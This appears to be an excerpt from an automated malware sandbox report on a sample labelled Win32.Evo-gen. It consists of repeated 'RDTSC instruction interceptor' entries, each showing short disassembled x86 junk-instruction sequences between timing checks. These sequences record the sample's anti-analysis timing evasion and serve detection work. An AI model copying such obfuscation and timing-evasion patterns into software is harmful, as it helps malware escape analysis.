                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D96662 second address: D7CF07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007FC73488207Ch 0x0000000c js 00007FC734882076h 0x00000012 popad 0x00000013 nop 0x00000014 sbb di, E0DAh 0x00000019 sbb ecx, 7009D88Ah 0x0000001f call dword ptr [ebp+122D380Eh] 0x00000025 jnc 00007FC734882097h 0x0000002b jp 00007FC73488207Eh 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DCC45F second address: DCC469 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC734E5F776h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DCC5F1 second address: DCC5FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DCC5FA second address: DCC605 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FC734E5F776h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DCC8AF second address: DCC8CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734882087h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DCC8CA second address: DCC8CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DCC8CF second address: DCC8D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DCCBA1 second address: DCCBBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC734E5F77Eh 0x00000009 jmp 00007FC734E5F77Ch 0x0000000e rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DD4354 second address: DD4358 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DD4358 second address: DD435C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DD4496 second address: DD44A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FC734882076h 0x0000000a popad 0x0000000b rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DD48B6 second address: DD4907 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F786h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pushad 0x0000000d je 00007FC734E5F77Ah 0x00000013 push ecx 0x00000014 jmp 00007FC734E5F77Eh 0x00000019 pop ecx 0x0000001a push eax 0x0000001b push edx 0x0000001c push esi 0x0000001d pop esi 0x0000001e jmp 00007FC734E5F785h 0x00000023 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DD520E second address: DD5217 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DD5217 second address: DD5221 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FC734E5F776h 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DD5221 second address: DD5227 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DD5227 second address: DD5234 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC734E5F778h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DD5234 second address: DD5265 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jc 00007FC734882076h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ebx 0x00000010 jo 00007FC734882095h 0x00000016 jmp 00007FC734882089h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DDAB7D second address: DDAB9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC734E5F787h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DD96F8 second address: DD9704 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DD9704 second address: DD9719 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC734E5F781h 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DD9719 second address: DD9721 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DD9721 second address: DD9726 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DDA9DF second address: DDA9EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 push ebx 0x0000000a push edx 0x0000000b pop edx 0x0000000c pop ebx 0x0000000d rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DDA9EC second address: DDA9FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC734E5F77Dh 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DDA9FD second address: DDAA15 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC73488207Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jnp 00007FC734882076h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DDCD2A second address: DDCD2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DDCD2E second address: DDCD4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC734882087h 0x0000000b rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DE109C second address: DE10A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DE1205 second address: DE1228 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007FC734882085h 0x0000000e jmp 00007FC73488207Fh 0x00000013 push eax 0x00000014 push edx 0x00000015 push edi 0x00000016 pop edi 0x00000017 push esi 0x00000018 pop esi 0x00000019 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DE13A8 second address: DE13D5 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC734E5F776h 0x00000008 jbe 00007FC734E5F776h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007FC734E5F788h 0x00000015 popad 0x00000016 pushad 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DE1569 second address: DE1579 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jnp 00007FC734882076h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DE1579 second address: DE1585 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC734E5F776h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DE54CD second address: DE54DD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jc 00007FC734882076h 0x00000010 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DE54DD second address: DE54F1 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC734E5F776h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e je 00007FC734E5F776h 0x00000014 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DE57E9 second address: DE57EF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DE5AA8 second address: DE5AAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DE5AAC second address: DE5AC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FC734882076h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d je 00007FC734882076h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DEA1B1 second address: DEA1C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007FC734E5F782h 0x0000000c ja 00007FC734E5F776h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DEA98B second address: DEA99E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC73488207Fh 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DEA99E second address: DEA9B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F784h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DEAAE9 second address: DEAAF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FC734882076h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DEF338 second address: DEF33F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DEEA63 second address: DEEA79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC734882080h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DEEA79 second address: DEEA7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DEED6D second address: DEED71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DF55E5 second address: DF55E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DF58BC second address: DF58D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC734882082h 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DF58D2 second address: DF58DA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DF58DA second address: DF58F5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FC734882081h 0x0000000f rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DF5E30 second address: DF5E48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FC734E5F782h 0x0000000b rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DF668F second address: DF6693 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DF6693 second address: DF66AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007FC734E5F77Ch 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DF66AC second address: DF66B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DF66B0 second address: DF66E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F77Dh 0x00000007 jmp 00007FC734E5F788h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jnc 00007FC734E5F77Ah 0x00000014 push edx 0x00000015 pop edx 0x00000016 push esi 0x00000017 pop esi 0x00000018 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DF66E3 second address: DF66EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DF66EA second address: DF66F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DF66F0 second address: DF66F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DF69B6 second address: DF69C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F77Bh 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DF69C7 second address: DF69CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DF6CFA second address: DF6D1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC734E5F77Ah 0x00000009 jmp 00007FC734E5F77Fh 0x0000000e jl 00007FC734E5F77Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DF6D1F second address: DF6D2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007FC73488208Ch 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DFF3AA second address: DFF3AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DFF3AE second address: DFF3B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DFF3B8 second address: DFF3BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DFF3BC second address: DFF3D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC73488207Ah 0x00000007 jbe 00007FC734882076h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DFE837 second address: DFE866 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push ecx 0x0000000a jno 00007FC734E5F776h 0x00000010 pop ecx 0x00000011 jmp 00007FC734E5F782h 0x00000016 popad 0x00000017 push ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a jnc 00007FC734E5F776h 0x00000020 push esi 0x00000021 pop esi 0x00000022 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DFE9AD second address: DFEA0C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FC734882076h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jmp 00007FC734882085h 0x00000010 popad 0x00000011 jmp 00007FC734882088h 0x00000016 pop edx 0x00000017 pop eax 0x00000018 pushad 0x00000019 jmp 00007FC734882081h 0x0000001e jnc 00007FC73488207Eh 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DFEA0C second address: DFEA10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DFEB3F second address: DFEB43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DFEB43 second address: DFEB4B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DFEB4B second address: DFEB63 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734882082h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DFEB63 second address: DFEB69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DFECB1 second address: DFECB7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DFECB7 second address: DFECC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FC734E5F782h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DFECC5 second address: DFECCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DFECCB second address: DFECCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DFECCF second address: DFECE5 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC73488207Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007FC734882076h 0x00000010 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DFECE5 second address: DFECE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DFEE3E second address: DFEE42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DFF0F9 second address: DFF0FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E07C99 second address: E07C9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E08426 second address: E0842E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E0842E second address: E08432 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E085A0 second address: E085BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F788h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E085BE second address: E085C3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E08742 second address: E08748 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E08748 second address: E0874E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
